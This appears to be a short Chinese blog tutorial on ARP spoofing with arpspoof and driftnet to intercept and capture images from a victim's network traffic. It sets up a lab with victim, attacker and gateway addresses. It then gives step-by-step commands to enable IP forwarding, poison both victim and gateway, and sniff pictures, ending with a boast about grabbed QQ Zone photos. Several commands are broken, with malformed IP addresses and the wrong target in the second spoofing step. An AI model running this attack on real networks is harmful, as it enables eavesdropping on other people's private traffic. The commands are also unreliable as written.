arpspoof+driftnet+ ARP欺骗简单图片抓取

arpspoof+driftnet+ ARP欺骗简单图片抓取

driftnet是一款简单而使用的图片捕获工具，可以很方便的在网络数据包中抓取图片。该工具可以实时和离线捕获指定数据包中是图片
环境

受害ip：192.168.228.130
攻击ip：192.168.228.129
网关：192.168.228.2

条件

1，开启或关闭IP转发
2，向被攻击机器发送arp欺骗数据包，冒充网关
3，向网关发送arp数据欺骗网关，冒充被攻击机器
4，运行driftnet截取图片

开启IP转发功能

cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

重定向受害者的流量传送给攻击者

arpspoof -t 192.168.130 168.168.228.2 -i eth0

使网关的数据重定向到攻击者的机器。（流量由网关到攻击者再到受攻击者）

arpspoof -t 168.168.228.2 192.168.228.129 -i eth0

监听

driftnet -i eth0

抓到的QQ空间图片-^^-